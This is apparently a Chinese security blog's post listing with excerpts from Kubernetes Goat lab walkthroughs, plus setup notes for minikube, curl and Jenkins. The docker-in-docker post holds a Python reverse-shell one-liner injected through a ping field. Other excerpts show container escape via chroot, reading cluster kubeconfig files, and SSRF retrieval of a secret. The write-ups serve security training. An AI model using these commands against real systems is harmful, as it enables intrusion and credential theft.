Putdownd’s Blog

Kubernetes CIS benchmarks analysisK8S CIS基线分析1cd /kubernetes-goat 12kubectl apply -f scenarios/kube-bench-security/node-job.yamlkubectl apply -f scenarios/kube-bench-security/master-job.yaml 1kubectl get pod 1kubectl logs -f kube-bench-master-xf2x9 结束

Docker CIS benchmarks analysisDocker CIS 基线分析 首先需要部署docker bench security将它启动为DaemonSet 1cd kubernetes-goat/ 1kubectl apply -f scenarios/docker-bench-security/deployment.yaml 运行容器应用 1kubectl get pod 1kubectl exec -it docker-bench-security-6npjf -- sh 等待结果就好了 结束

Container escape to the host system 查看环境 查看挂载 mount/df -Th 找到挂载目录ls -la /host-system 切换到宿主机的目录1chroot /host-system bash docker ps 查看k8s配置文件 1cat /etc/kubernetes/controller-manager.conf 可使用kubectl利用配置文件获取集群内的所有资源。 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all -n kube-system 1kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pod

SSRF in the Kubernetes (K8S) world SSRF 可以使用bp抓包爆破判断端口号 找到5000端口 根据回显继续访问 找到新的路径 继续往下拼接 就这样以此类推 1http://metadata-db/latest/secrets/kubernetes-goat 解密 1azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI= 1k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab

Kubernetes Goat 02 - docker in docker 靶机ip：http://192.168.72.129:1231/ 能执行ping命令 职业习惯加个管道符 反弹shell 尝试使用bash来反弹没有成功 使用python反弹执行成功 监听 执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la  mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器，而无需在宿主机上安装 Docker。 docker ...

Kubernetes Goat 01 开发人员倾向于将敏感信息提交给版本控制系统。当我们转向 CI/CD 和 GitOps 系统时，我们往往会忘记识别代码和提交中的敏感信息。让我们看看能不能在这里找到一些很酷的东西！ 提示源码泄露 目标网站 http://192.168.72.129:1230/ 开始测试目录扫描 git泄露 利用工具：https://github.com/arthaud/git-dumper goat是自定义下载的文件夹 1python git_dumper.py http://192.168.72.129:1230/ goat git命令 windows没有git环境 git下载：https://git-scm.com/ 查看log 使用git checkout查看 git checkout -f 进行切换 ls -la查看所有文件 查看.env 结束

前提 前置条件：确保您拥有 Kubernetes 集群的管理员访问权限并安装了kubectl k8s环境可参考：https://blog.putdown.top/archives/a31b6d49.html 介绍 靶场地址：https://github.com/madhuakula/kubernetes-goat 实验环境：安装minikube后的 Ubuntu 22.04的虚拟机 靶场内容12345678910111213141516171819202122Sensitive keys in codebasesDIND (docker-in-docker) exploitationSSRF in the Kubernetes (K8S) worldContainer escape to the host systemDocker CIS benchmarks analysisKubernetes CIS benchmarks analysisAttacking private registryNodePort exposed servicesHelm v2 tiller to P ...

搭建环境 虚拟机：Ubuntu 22.04 虚拟机配置4C/4G 使用minikube搭建 配置proxychains ；在下面wget curl等下载文件时不能正常下载时使用 参考 https://icybersec.gitbook.io/cybersecuritynote/yun-wei-pei-zhi/kubernetes/an-zhuang-bu-shu#an-zhuang-minikube https://blog.csdn.net/QiVictory/article/details/119535043 开始搭建安装docker1apt install -y docker.io go语言环境-编译cri-dockerd的go版本要大于1.9.1 第一种，官方，执行./installer_linux报错的话建议第二种, 1234wget https://storage.googleapis.com/golang/getgo/installer_linuxchmod +x ./installer_linux./installer_linuxsource ~/.b ...

正常get请求1curl https://putdown.top -k1忽略证书 bp抓包 1curl https://putdown.top -k -A 修改ua头1https://putdown.top -k -A Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61 对比上图发生了改变 -X 修改请求方式1https://putdown.top -k -A Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61 -X POST -H 添加http请求头 这边随便写个A:B 1curl https://putdown.top -k -A Mozilla/5 ...

实验环境 ubuntu20 虚拟机 安装 Jenkins安装Java12sudo apt updatesudo apt install openjdk-11-jdk 开始安装Jenkins 使用下面的wget命令，导入 Jenkins 软件源的 GPG keys： 1wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add - 下一步，添加软件源到系统中： 1sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' 一旦 Jenkins 软件源被启用，升级apt软件包列表，并且安装最新版本的 Jenkins： 12sudo apt updatesudo apt install jenkins Ubuntu安装Jenkins报错解决 1234567891011121314正在读取软件包列表.. ...